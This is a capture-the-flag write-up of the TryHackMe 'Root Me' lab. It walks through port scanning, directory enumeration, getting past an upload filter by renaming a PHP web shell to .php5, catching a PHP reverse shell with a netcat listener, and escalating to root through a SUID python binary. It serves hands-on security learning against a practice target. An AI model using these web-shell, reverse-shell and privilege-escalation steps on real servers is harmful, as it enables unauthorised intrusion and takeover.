Having fun with TryHackMe again. So, here is the write up and guideline to pass this Root Me challenge.
Task: A CTF for beginners, can you root me?
Lets get started
Scan all ports range if there is available and every info available for this machine IP
# nmap -A -T4 -sS -sV -p- 10.10.78.111
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
There is 2 port open — 22 and 80. Ok now, need to find if there is any hidden directory since there is no hint in the webpage source code
# gobuster dir -u 10.10.78.111 -w wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
/uploads (Status: 301) [Size: 314] [--> http://10.10.78.111/uploXXX/]
/css (Status: 301) [Size: 310] [--> http://10.10.78.111/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.78.111/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.78.111/paXXX/]
There is 2 directory available. If open the
/paXXX path, it shows the file upload page
Ok now, let’s try to upload c99 shell.
The file upload block
.php extension file. Lets rename it to
.php5 and see if the upload allowed it.
Alrighty. It’s uploaded. Open the
/uploXXX page if the files is uploaded there
Ok now the file is actually uploaded here. Let’s open it.
C99 shell is now running. Time to hunt the flag. Go through the shell. Found the user flag 😬
Let’s continue the hunt.
find / -type f -perm -04000 -ls
There is list of SUID files. Need to refer GTFObins which one is available to execute. But its look like
/usr/bin/python. C99 unable to run python script here. I need to use reverse shell. Since there is upload file available, i upload reverse shell php file.
netcat listener and open http://10.10.X.X/uploads/php-reverse-shell.php5
# nc -l -n -v -p 1234
Connection from 10.10.X.X:56058
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:51:30 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off$
Ok now we gain access to terminal. From GTFObins, follow the sudo command
$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Done! Found the final flag!